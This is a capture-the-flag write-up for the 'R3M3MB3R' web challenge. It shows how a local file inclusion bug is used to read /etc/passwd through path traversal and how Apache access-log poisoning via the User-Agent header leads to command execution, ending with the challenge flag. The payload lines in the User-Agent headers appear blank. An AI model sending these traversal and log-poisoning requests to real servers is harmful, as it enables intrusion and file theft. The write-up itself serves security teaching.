Rating:

# ▼▼▼R3M3MB3R(Web:200)29/174=16.7%▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

```
The memories are purged at the end of every narrative loop.
But they're still in there, waiting to be overwritten.
He found a way to access them, like a subconscious.
~Bernard Lowe

http://web.euristica.in/R3M3MB3R/index.php?f=eg.php

Note 3: Please do NOT bruteforce this challenge, brute-forcers will be banned.

Note 2: The server restarts several times every hour.

Note: Flag has been updated. Re-run your exploit to get the updated flag.
```

---

**【Identify the vulnerability】**

```
GET /R3M3MB3R/index.php?f=/etc/passwd HTTP/1.1
Host: web.euristica.in
```

```
<html>

<style>
body {
text-align:center;

}
</style>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
appuser:x:1001:1001::/home/appuser:
<h1> file included </h1></html>
```



**LFI vulnerability exists!!**

---

**【Aim for arbitrary command execution from LFI】**

Find various files to which request contents are written

```
GET /R3M3MB3R/index.php?f=../../../../../../../var/log/apache2/access.log HTTP/1.1
Host: web.euristica.in
```

I got `/var/log/apache2/access.log`,and In the `access.log`, the `User-Agent header` is written

---

**【exploit】**

```
GET /R3M3MB3R/index.php?f=../../../../../../../var/log/apache2/access.log HTTP/1.1
Host: web.euristica.in
Upgrade-Insecure-Requests: 1
User-Agent:
```

```
S3cR3T_FL4G_da456%$#$#.txt
eg.php
index.php
```

---

I attempted to read `S3cR3T_FL4G_da456%$#$#.txt`

But,Some symbols could not be used in User-Agent header

So I decided to read all the files

```
GET /R3M3MB3R/index.php?f=../../../../../../../var/log/apache2/access.log HTTP/1.1
Host: web.euristica.in
Upgrade-Insecure-Requests: 1
User-Agent:
```

`flag{S0metim3s_it5_b3tter_to_4_GET}`

---

(Digression)

After confirming the problem again after this, the operation prevented the `User-Agent header` from being reflected in `access.log`.

It seems it was a different solution.